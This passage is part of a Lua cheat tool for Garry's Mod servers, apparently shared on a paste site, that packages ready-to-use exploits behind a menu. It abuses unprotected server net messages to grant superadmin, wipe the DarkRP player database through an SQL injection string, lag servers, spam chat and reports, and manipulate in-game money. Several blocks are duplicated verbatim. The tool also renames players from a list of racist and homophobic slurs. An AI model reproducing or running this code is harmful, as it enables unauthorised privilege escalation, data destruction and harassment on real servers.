  10218. net.WriteString( "DUDE" )
  10219. net.SendToServer()
  10220. end)
  10221. else
  10222. timer.Remove( "loki_bonghit" )
  10223. end
  10224. end, },
  10225. },
  10226. } )
  10227.  
  10228. LOKI.AddExploit( "Dude Weed Lmao", {
  10229. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10230. severity = 1,
  10231. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10232. functions = {
  10233. { typ = "func", name = "Big Weed", func = function()
  10234. if !timer.Exists( "loki_bonghit" ) then
  10235. timer.Create( "loki_bonghit", 0.1, 0, function()
  10236. net.Start( "weed" )
  10237. net.WriteString( "DUDE" )
  10238. net.SendToServer()
  10239. end)
  10240. else
  10241. timer.Remove( "loki_bonghit" )
  10242. end
  10243. end, },
  10244. },
  10245. } )
  10246.  
  10247. LOKI.AddExploit( "Dude Weed Lmao", {
  10248. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10249. severity = 1,
  10250. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10251. functions = {
  10252. { typ = "func", name = "Big Weed", func = function()
  10253. if !timer.Exists( "loki_bonghit" ) then
  10254. timer.Create( "loki_bonghit", 0.1, 0, function()
  10255. net.Start( "weed" )
  10256. net.WriteString( "DUDE" )
  10257. net.SendToServer()
  10258. end)
  10259. else
  10260. timer.Remove( "loki_bonghit" )
  10261. end
  10262. end, },
  10263. },
  10264. } )
  10265.  
  10266. LOKI.AddExploit( "Dude Weed Lmao", {
  10267. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10268. severity = 1,
  10269. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10270. functions = {
  10271. { typ = "func", name = "Big Weed", func = function()
  10272. if !timer.Exists( "loki_bonghit" ) then
  10273. timer.Create( "loki_bonghit", 0.1, 0, function()
  10274. net.Start( "weed" )
  10275. net.WriteString( "DUDE" )
  10276. net.SendToServer()
  10277. end)
  10278. else
  10279. timer.Remove( "loki_bonghit" )
  10280. end
  10281. end, },
  10282. },
  10283. } )
  10284.  
  10285. LOKI.AddExploit( "Dude Weed Lmao", {
  10286. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10287. severity = 1,
  10288. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10289. functions = {
  10290. { typ = "func", name = "Big Weed", func = function()
  10291. if !timer.Exists( "loki_bonghit" ) then
  10292. timer.Create( "loki_bonghit", 0.1, 0, function()
  10293. net.Start( "weed" )
  10294. net.WriteString( "DUDE" )
  10295. net.SendToServer()
  10296. end)
  10297. else
  10298. timer.Remove( "loki_bonghit" )
  10299. end
  10300. end, },
  10301. },
  10302. } )
  10303.  
  10304. LOKI.AddExploit( "Dude Weed Lmao", {
  10305. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10306. severity = 1,
  10307. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10308. functions = {
  10309. { typ = "func", name = "Big Weed", func = function()
  10310. if !timer.Exists( "loki_bonghit" ) then
  10311. timer.Create( "loki_bonghit", 0.1, 0, function()
  10312. net.Start( "weed" )
  10313. net.WriteString( "DUDE" )
  10314. net.SendToServer()
  10315. end)
  10316. else
  10317. timer.Remove( "loki_bonghit" )
  10318. end
  10319. end, },
  10320. },
  10321. } )
  10322.  
  10323. LOKI.AddExploit( "Dude Weed Lmao", {
  10324. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10325. severity = 1,
  10326. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10327. functions = {
  10328. { typ = "func", name = "Big Weed", func = function()
  10329. if !timer.Exists( "loki_bonghit" ) then
  10330. timer.Create( "loki_bonghit", 0.1, 0, function()
  10331. net.Start( "weed" )
  10332. net.WriteString( "DUDE" )
  10333. net.SendToServer()
  10334. end)
  10335. else
  10336. timer.Remove( "loki_bonghit" )
  10337. end
  10338. end, },
  10339. },
  10340. } )
  10341.  
  10342. LOKI.AddExploit( "Dude Weed Lmao", {
  10343. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10344. severity = 1,
  10345. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10346. functions = {
  10347. { typ = "func", name = "Big Weed", func = function()
  10348. if !timer.Exists( "loki_bonghit" ) then
  10349. timer.Create( "loki_bonghit", 0.1, 0, function()
  10350. net.Start( "weed" )
  10351. net.WriteString( "DUDE" )
  10352. net.SendToServer()
  10353. end)
  10354. else
  10355. timer.Remove( "loki_bonghit" )
  10356. end
  10357. end, },
  10358. },
  10359. } )
  10360.  
  10361. LOKI.AddExploit( "Dude Weed Lmao", {
  10362. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  10363. severity = 1,
  10364. scan = function() return LOKI.ValidNetString( "weed" ) end,
  10365. functions = {
  10366. { typ = "func", name = "Big Weed", func = function()
  10367. if !timer.Exists( "loki_bonghit" ) then
  10368. timer.Create( "loki_bonghit", 0.1, 0, function()
  10369. net.Start( "weed" )
  10370. net.WriteString( "DUDE" )
  10371. net.SendToServer()
  10372. end)
  10373. else
  10374. timer.Remove( "loki_bonghit" )
  10375. end
  10376. end, },
  10377. },
  10378. } )
  10379.  
  10380. LOKI.AddExploit( "Give yourself superadmin", {
  10381. desc = "Give yourself superadmin (rejoin for it to take effect)",
  10382. severity = 4,
  10383. scan = function() return LOKI.ValidNetString( "pplay_deleterow" ) end,
  10384. functions = {
  10385. { typ = "func", name = "Gibsmedat", func = function()
  10386. local id = LocalPlayer():SteamID()
  10387. local tbl = {}
  10388. tbl.name = "FAdmin_PlayerGroup"
  10389. tbl.where = {
  10390. "steamid",
  10391. tostring(id)
  10392. }
  10393. net.Start("pplay_deleterow")
  10394. net.WriteTable(tbl)
  10395. net.SendToServer()
  10396.  
  10397. local tbl = {}
  10398. tbl.tblname = "FAdmin_PlayerGroup"
  10399. tbl.tblinfo = {
  10400. tostring(id),
  10401. "superadmin"
  10402. }
  10403. net.Start("pplay_addrow")
  10404. net.WriteTable(tbl)
  10405. net.SendToServer()
  10406. LOKI.ChatText( "You will be superadmin when you rejoin the server" )
  10407. end, },
  10408. },
  10409. } )
  10410.  
  10411. LOKI.AddExploit( "Break DarkRP", {
  10412. desc = "Vandalize the darkrp master SQL database, permenantly erasing all darkrp player data",
  10413. severity = 4,
  10414. scan = function() return LOKI.ValidNetString( "pplay_sendtable" ) end,
  10415. functions = {
  10416. { typ = "func", name = "Burn it down", func = function()
  10417. local tbl = {}
  10418. tbl.tblname = "darkrp_door; DROP TABLE darkrp_player; CREATE TABLE darkrp_player(a STRING)"
  10419. tbl.ply = LocalPlayer()
  10420. net.Start("pplay_sendtable")
  10421. net.WriteTable(tbl)
  10422. net.SendToServer()
  10423. LOKI.ChatText( "Server SQL database de_stroyed" )
  10424. end, },
  10425. },
  10426. } )
  10427.  
  10428. LOKI.AddExploit( "Vandalize Server Data", {
  10429. desc = "Vandalize the servers data folder, probably won't do any real damage but will annoy their devs",
  10430. severity = 3,
  10431. scan = function() return LOKI.ValidNetString( "WriteQuery" ) end,
  10432. functions = {
  10433. { typ = "func", name = "Do it", func = function()
  10434. if !timer.Exists( "loki_datatrasher" ) then
  10435. LOKI.ChatText( "Starting data folder rape" )
  10436. timer.Create( "loki_datatrasher", 0.5, 0, function()
  10437. net.Start( "WriteQuery" )
  10438. net.WriteString( "BUY ODIUM.PRO"..string.rep( "!", math.random( 1, 50 ) ) )
  10439. net.SendToServer()
  10440. end)
  10441. else
  10442. timer.Remove( "loki_datatrasher" )
  10443. LOKI.ChatText( "Stopping data folder rape" )
  10444. end
  10445. end, },
  10446. },
  10447. } )
  10448.  
  10449. LOKI.AddExploit( "Turbo Chat Spam", {
  10450. desc = "Basically chatspam but with 0 time limit, spams like crazy",
  10451. severity = 1,
  10452. scan = function() return LOKI.ValidNetString( "VJSay" ) end,
  10453. functions = {
  10454. { typ = "string", name = "Enter a message", default = "GET ODIUM.PRO", addr = "vj_spamstring" },
  10455. { typ = "func", name = "Big Spams", func = function()
  10456. if !timer.Exists( "bigspamsvj" ) then
  10457. LOKI.ChatText( "Starting big spams" )
  10458. timer.Create( "bigspamsvj", 0.1, 0, function()
  10459. for k, v in pairs( player.GetAll() ) do
  10460. net.Start( "VJSay" )
  10461. net.WriteEntity( v )
  10462. net.WriteBool( 0 )
  10463. net.WriteString( LOKI.GetStored( "vj_spamstring", "GET ODIUM.PRO" ) )
  10464. net.SendToServer()
  10465. end
  10466. end)
  10467. else
  10468. timer.Remove( "bigspamsvj" )
  10469. LOKI.ChatText( "Stopping big spams" )
  10470. end
  10471. end, },
  10472. },
  10473. } )
  10474.  
  10475. LOKI.AddExploit( "Free Shekels", {
  10476. desc = "Give yourself a crapton of money",
  10477. severity = 3,
  10478. scan = function() return LOKI.ValidNetString( "SendMoney" ) end,
  10479. functions = {
  10480. { typ = "func", name = "Give me shekels", func = function()
  10481. net.Start( "SendMoney" )
  10482. net.WriteEntity( LocalPlayer() )
  10483. net.WriteEntity( LocalPlayer() )
  10484. net.WriteEntity( LocalPlayer() )
  10485. net.WriteString( "-1000000" )
  10486. net.SendToServer()
  10487. end, },
  10488. { typ = "func", name = "Give everybody shekels", func = function()
  10489. for k, v in pairs( player.GetAll() ) do
  10490. net.Start( "SendMoney" )
  10491. net.WriteEntity( v )
  10492. net.WriteEntity( v )
  10493. net.WriteEntity( v )
  10494. net.WriteString( "-1000000" )
  10495. net.SendToServer()
  10496. end
  10497. end, },
  10498. { typ = "func", name = "Make everybody poor", func = function()
  10499. for k, v in pairs( player.GetAll() ) do
  10500. net.Start( "SendMoney" )
  10501. net.WriteEntity( v )
  10502. net.WriteEntity( v )
  10503. net.WriteEntity( v )
  10504. net.WriteString( "100000000" )
  10505. net.SendToServer()
  10506. end
  10507. end, },
  10508. },
  10509. } )
  10510.  
  10511. LOKI.AddExploit( "Free Shekels #2", {
  10512. desc = "Give yourself a crapton of money",
  10513. severity = 2,
  10514. scan = function() return LOKI.ValidNetString( "BailOut" ) end,
  10515. functions = {
  10516. { typ = "func", name = "Give me shekels", func = function()
  10517. for k, v in pairs(player.GetAll()) do
  10518. net.Start( "BailOut" )
  10519. WriteEntity( LocalPlayer() )
  10520. WriteEntity( v )
  10521. net.WriteFloat( -1000000 )
  10522. net.SendToServer()
  10523. end
  10524. end, },
  10525. },
  10526. } )
  10527.  
  10528. LOKI.AddExploit( "Printer Smasher", {
  10529. desc = "Apply constant damage to any printers nearby",
  10530. severity = 2,
  10531. scan = function() return LOKI.ValidNetString( "customprinter_get" ) end,
  10532. functions = {
  10533. { typ = "func", name = "Smash dem printers", func = function()
  10534. if !timer.Exists( "loki_printersmasher" ) then
  10535. LOKI.ChatText( "Starting Printer Smasher" )
  10536. timer.Create( "loki_printersmasher", 0.05, 0, function()
  10537. for k, v in pairs( ents.GetAll() ) do
  10538. if ( v:GetClass():find("print") && v:GetPos():Distance( LocalPlayer():GetPos() ) <= 750 ) then
  10539. net.Start("customprinter_get")
  10540. net.WriteEntity(v)
  10541. net.WriteString("onoff")
  10542. net.SendToServer()
  10543. end
  10544. end
  10545. end)
  10546. else
  10547. timer.Remove( "loki_printersmasher" )
  10548. LOKI.ChatText( "Stopping Printer Smasher" )
  10549. end
  10550. end, },
  10551. },
  10552. } )
  10553.  
  10554. local names = { "Nigger", "Faggot", "Kike", "Cuckmaster", "Skid", "GetOdium", "OdiumDotPro", "Shit", "Piss", "Permavirgin", "CitizenRat", "Feminist", "Fuckhead", "Cunt", "Odium", "CockWart", "DickTickle", "FuckAdmins", "Paidmin", "ShitServer" }
  10555.  
  10556. LOKI.AddExploit( "Fuck up RPnames", {
  10557. desc = "Destroy everybodys RPnames",
  10558. severity = 2,
  10559. scan = function() return LOKI.ValidNetString( "NC_GetNameChange" ) end,
  10560. functions = {
  10561. { typ = "func", name = "Renamer", func = function()
  10562. if !timer.Exists( "loki_renamer" ) then
  10563. LOKI.ChatText( "Starting Renamer" )
  10564. timer.Create( "loki_renamer", 5, 0, function()
  10565. for k, v in pairs( player.GetAll() ) do
  10566. net.Start("NC_GetNameChange")
  10567. net.WriteEntity(v)
  10568. net.WriteString(table.Random(names))
  10569. net.WriteString(table.Random(names))
  10570. net.SendToServer()
  10571. end
  10572. end)
  10573. else
  10574. timer.Remove( "loki_renamer" )
  10575. LOKI.ChatText( "Stopping Renamer" )
  10576. end
  10577. end, },
  10578. },
  10579. } )
  10580.  
  10581. LOKI.AddExploit( "Lagsploit", {
  10582. desc = "Lag the shit out of the server",
  10583. severity = 3,
  10584. scan = function() return LOKI.ValidNetString( "ATS_WARP_REMOVE_CLIENT" ) end,
  10585. functions = {
  10586. { typ = "func", name = "Big Lags", func = function()
  10587. if !timer.Exists( "loki_lagsploit1" ) then
  10588. LOKI.ChatText( "Starting Lag" )
  10589. timer.Create( "loki_lagsploit1", 0.02, 0, function()
  10590. for k,v in pairs(player.GetAll()) do
  10591. net.Start( "ATS_WARP_REMOVE_CLIENT" )
  10592. net.WriteEntity( v )
  10593. net.WriteString( "adminroom1" )
  10594. net.SendToServer()
  10595. net.Start( "ATS_WARP_FROM_CLIENT" )
  10596. net.WriteEntity( v )
  10597. net.WriteString( "adminroom1" )
  10598. net.SendToServer()
  10599. net.Start( "ATS_WARP_VIEWOWNER" )
  10600. net.WriteEntity( v )
  10601. net.WriteString( "adminroom1" )
  10602. net.SendToServer()
  10603. end
  10604. end)
  10605. else
  10606. timer.Remove( "loki_lagsploit1" )
  10607. LOKI.ChatText( "Stopping Lag" )
  10608. end
  10609. end, },
  10610. },
  10611. } )
  10612.  
  10613. LOKI.AddExploit( "Lagsploit #2", {
  10614. desc = "Lag the shit out of the server",
  10615. severity = 3,
  10616. scan = function() return LOKI.ValidNetString( "CFJoinGame" ) end,
  10617. functions = {
  10618. { typ = "func", name = "Big Lags", func = function()
  10619. if !timer.Exists( "loki_lagsploit2" ) then
  10620. LOKI.ChatText( "Starting Lag" )
  10621. timer.Create( "loki_lagsploit2", 0.01, 0, function()
  10622. for k,v in pairs(player.GetAll()) do
  10623. net.Start( "CFRemoveGame" )
  10624. net.WriteFloat( math.Round( "10000\n" ) )
  10625. net.SendToServer()
  10626. net.Start( "CFJoinGame" )
  10627. net.WriteFloat( math.Round( "10000\n" ) )
  10628. net.SendToServer()
  10629. net.Start( "CFEndGame" )
  10630. net.WriteFloat( "10000\n" )
  10631. net.SendToServer()
  10632. end
  10633. end)
  10634. else
  10635. timer.Remove( "loki_lagsploit2" )
  10636. LOKI.ChatText( "Stopping Lag" )
  10637. end
  10638. end, },
  10639. },
  10640. } )
  10641.  
  10642. LOKI.AddExploit( "Lagsploit #3", {
  10643. desc = "Cause a short burst of lags",
  10644. severity = 3,
  10645. scan = function() return LOKI.ValidNetString( "textscreens_download" ) end,
  10646. functions = {
  10647. { typ = "func", name = "Burst Lag", func = function()
  10648. for i = 0, 255 do
  10649. for k,v in pairs(player.GetAll()) do
  10650. net.Start("textscreens_download")
  10651. net.WriteEntity(v)
  10652. net.SendToServer()
  10653. end
  10654. end
  10655. end, },
  10656. },
  10657. } )
  10658.  
  10659. LOKI.AddExploit( "Zombie Mode", {
  10660. desc = "Get straight back up again after being killed",
  10661. severity = 1,
  10662. scan = function() return LOKI.ValidNetString( "RevivePlayer" ) end,
  10663. functions = {
  10664. { typ = "func", name = "Make me Immortal", func = function()
  10665. if !timer.Exists( "loki_zombie" ) then
  10666. LOKI.ChatText( "Becoming a zombie" )
  10667. timer.Create( "loki_zombie", 0.5, 0, function()
  10668. if !LocalPlayer():Alive() then
  10669. net.Start("RevivePlayer")
  10670. WriteEntity(LocalPlayer())
  10671. net.SendToServer()
  10672. end
  10673. end)
  10674. else
  10675. timer.Remove( "loki_zombie" )
  10676. LOKI.ChatText( "Becoming mortal again" )
  10677. end
  10678. end, },
  10679. },
  10680. } )
  10681.  
  10682. LOKI.AddExploit( "Steal Police Guns", {
  10683. desc = "Grab police weapons from the armory, has a 5 minute cooldown",
  10684. severity = 1,
  10685. scan = function() return LOKI.ValidNetString( "ARMORY_RetrieveWeapon" ) end,
  10686. functions = {
  10687. { typ = "func", name = "Get M16", func = function()
  10688. net.Start("ARMORY_RetrieveWeapon")
  10689. net.WriteString("weapon1")
  10690. net.SendToServer()
  10691. end, },
  10692. { typ = "func", name = "Get Shotgun", func = function()
  10693. net.Start("ARMORY_RetrieveWeapon")
  10694. net.WriteString("weapon2")
  10695. net.SendToServer()
  10696. end, },
  10697. { typ = "func", name = "Get Sniper", func = function()
  10698. net.Start("ARMORY_RetrieveWeapon")
  10699. net.WriteString("weapon3")
  10700. net.SendToServer()
  10701. end, },
  10702. },
  10703. } )
  10704.  
  10705. LOKI.AddExploit( "Poseidon Report Spammer", {
  10706. desc = "Spam reports on everybody on the server",
  10707. severity = 1,
  10708. scan = function() return LOKI.ValidNetString( "TransferReport" ) end,
  10709. functions = {
  10710. { typ = "func", name = "Report Everybody", func = function()
  10711. for k, v in pairs( player.GetAll() ) do
  10712. net.Start( "TransferReport" )
  10713. net.WriteString( v:SteamID() )
  10714. net.WriteString( "INFERNUS AND BAT ARE FAGGOTS FOR EACH OTHER" )
  10715. net.WriteString( "DITCH THIS SHITTY SERVER AND BUY ODIUM.PRO TODAY" )
  10716. net.SendToServer()
  10717. end
  10718. end, },
  10719. },
  10720. } )
  10721.  
  10722. ---------------------------------------------------------------------------------------------------------------------
  10723.  
  10724.  
  10725.  
  10726.  
  10727. function LOKI.MakeFunctionButton( parent, x, y, btext, func, tooltip)
  10728. if !parent:IsValid() then return end
  10729.  
  10730. local TButton = vgui.Create( "DButton" )
  10731. TButton:SetParent( parent )
  10732. TButton:SetPos( x, y )
  10733. TButton:SetText( btext )
  10734. TButton:SetTextColor( Color(255, 255, 255, 255) )
  10735. TButton:SizeToContents()
  10736. TButton:SetTall( 24 )
  10737. if tooltip then TButton:SetToolTip( tooltip ) end
  10738.  
  10739. TButton.Paint = function( self, w, h )
  10740. surface.SetDrawColor( Color(60, 60, 60, 200) )
  10741. surface.DrawRect( 0, 0, w, h )
  10742. surface.SetDrawColor( Color( 60, 60, 60 ) )
  10743. surface.SetMaterial( downgrad )
  10744. surface.DrawTexturedRect( 0, 0, w, h/ 2 )
  10745.  
  10746. surface.SetDrawColor( Color(100, 100, 100, 255) )
  10747. surface.DrawOutlinedRect( 0, 0, w, h )
  10748. end
  10749.  
  10750.  
  10751. TButton.DoClick = function()
  10752. func()
  10753. end
  10754.  
  10755. return TButton:GetWide(), TButton:GetTall()
  10756. end
  10757.  
  10758. function LOKI.MakeTextInputButton( parent, x, y, btext, default, addr)
  10759. if !parent:IsValid() then return end
  10760.  
  10761. local hostframe = vgui.Create( "DPanel", parent )
  10762. hostframe:SetPos( x, y )
  10763. --hostframe:SetSize( 480, :GetTall() - 40 )
  10764.  
  10765. hostframe.Paint = function( self, w, h )
  10766. surface.SetDrawColor( Color(60, 60, 60, 200) )
  10767. surface.DrawRect( 0, 0, w, h )
  10768. surface.SetDrawColor( Color( 60, 60, 60 ) )
  10769. surface.SetMaterial( downgrad )
  10770. surface.DrawTexturedRect( 0, 0, w, h/ 2 )
  10771. surface.SetDrawColor( Color(100, 100, 100, 255) )
  10772. surface.DrawOutlinedRect( 0, 0, w, h )
  10773. end
  10774.  
  10775. local tttt = vgui.Create( "DLabel", hostframe )
  10776. tttt:SetPos( 5, 5 )
  10777. tttt:SetText( btext )
  10778. tttt:SizeToContents()
  10779.  
  10780. local tentry = vgui.Create( "DTextEntry", hostframe )
  10781. tentry:SetPos( 10 + tttt:GetWide(), 2 )
  10782. tentry:SetSize( 130, 20 )
  10783. tentry:SetText( LOKI.GetStored( addr, default ) )
  10784. tentry.OnChange = function( self )
  10785. LOKI.Store( addr, self:GetValue() )
  10786. end
  10787.  
  10788. hostframe:SetSize( 13 + tttt:GetWide() + tentry:GetWide(), 24 )
  10789.  
  10790. return hostframe:GetWide(), hostframe:GetTall()
  10791. end
  10792.  
  10793.  
  10794. concommand.Add( "loki_menu", function()
  10795. if LOKI.Menu and LOKI.Menu:IsVisible() then return end
  10796.  
  10797. LOKI.Menu = vgui.Create("DFrame")
  10798. LOKI.Menu:SetSize(700,550)
  10799. LOKI.Menu:SetTitle("Loki Sploiter -- Created by LegendofRobbo -- Shoutout to x0m, laxz and crazyzultan for finding many of these sploits")
  10800. LOKI.Menu:Center()
  10801. LOKI.Menu:MakePopup()
  10802. LOKI.Menu.gay = table.Count( LOKI.sploits )
  10803.  
  10804. LOKI.Menu.Paint = function( s, w, h )
  10805. surface.SetDrawColor( Color(30, 30, 30, 245) )
  10806. surface.DrawRect( 0, 0, w, h )
  10807. surface.SetDrawColor( Color(55, 55, 55, 245) )
  10808. surface.DrawOutlinedRect( 0, 0, w, h )
  10809. surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
  10810.  
  10811. surface.SetDrawColor( Color(0, 0, 0, 200) )
  10812. surface.DrawRect( 80, 25, w - 90, h - 35 )
  10813.  
  10814. surface.SetDrawColor( Color(100, 100, 100, 200) )
  10815.  
  10816. surface.DrawLine( 10, 25, 40, 30 )
  10817. surface.DrawLine( 40, 30, 70, 25 )
  10818.  
  10819. surface.DrawLine( 10, 25, 25, 40 )
  10820. surface.DrawLine( 55, 40, 70, 25 )
  10821.  
  10822. surface.DrawLine( 25, 40, 25, 60 )
  10823. surface.DrawLine( 55, 40, 55, 60 )
  10824.  
  10825. surface.DrawLine( 25, 60, 40, 70 )
  10826. surface.DrawLine( 55, 60, 40, 70 )
  10827.  
  10828. draw.DrawText( "Sploit Library\nStandard: "..LOKI.Menu.gay.."\nCustom: 0", "default", 8, 85, Color(255,255,255, 30) )
  10829.  
  10830. end
  10831.  
  10832. local Plist = vgui.Create( "DPanelList", LOKI.Menu )
  10833. Plist:SetSize( LOKI.Menu:GetWide() - 90, LOKI.Menu:GetTall() - 35 )
  10834. Plist:SetPadding( 5 )
  10835. Plist:SetSpacing( 5 )
  10836. Plist:EnableHorizontal( false )
  10837. Plist:EnableVerticalScrollbar( true )
  10838. Plist:SetPos( 80, 25 )
  10839. Plist:SetName( "" )
  10840.  
  10841.  
  10842. local function CreateSploitPanel( name, t )
  10843. if !LOKI.Menu then return end
  10844. local cmdp = vgui.Create( "DPanel" )
  10845. cmdp:SetSize( Plist:GetWide(), 70 )
  10846. cmdp.Cmd = name
  10847. cmdp.Desc = t.desc
  10848. cmdp.Paint = function( s, w, h )
  10849. surface.SetDrawColor( Color(50, 50, 50, 245) )
  10850. surface.DrawRect( 0, 0, w, h )
  10851. surface.SetDrawColor( severitycols[t.severity] )
  10852. surface.DrawOutlinedRect( 0, 0, w, h )
  10853. surface.DrawLine( 0, 24, w, 24 )
  10854. draw.DrawText( cmdp.Cmd, "DermaDefault", 10, 5, Color(255,255,255) )
  10855. draw.DrawText( cmdp.Desc, "DermaDefault", 10, 28, Color(205,205,255, 100) )
  10856. end
  10857.  
  10858. local x = 10
  10859. for _, tab in ipairs( t.functions ) do
  10860. if tab.typ == "func" then
  10861. x = (x + 5) + LOKI.MakeFunctionButton( cmdp, x, 42, tab.name, tab.func )
  10862. elseif tab.typ == "string" then
  10863. x = (x + 5) + LOKI.MakeTextInputButton( cmdp, x, 42, tab.name, tab.default, tab.addr )
  10864. if !LOKI.IsStored( tab.addr ) then LOKI.Store( tab.addr, tab.default ) end
  10865. end
  10866. /*
  10867. if isfunction( func ) then
  10868. x = (x + 5) + LOKI.MakeFunctionButton( cmdp, x, 42, nm, func )
  10869. elseif istable( func ) then
  10870. x = (x + 5) + LOKI.MakeTextInputButton( cmdp, x, 42, "ASS CANCER", "FAGGOT", "nigg" )
  10871. end
  10872. */
  10873. end
  10874.  
  10875. Plist:AddItem( cmdp )
  10876. end
  10877.  
  10878.  
  10879. for k, v in pairs( LOKI.sploits ) do
  10880. if v.scan() then CreateSploitPanel( k, v ) end
  10881. end
  10882.  
  10883.  
  10884. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement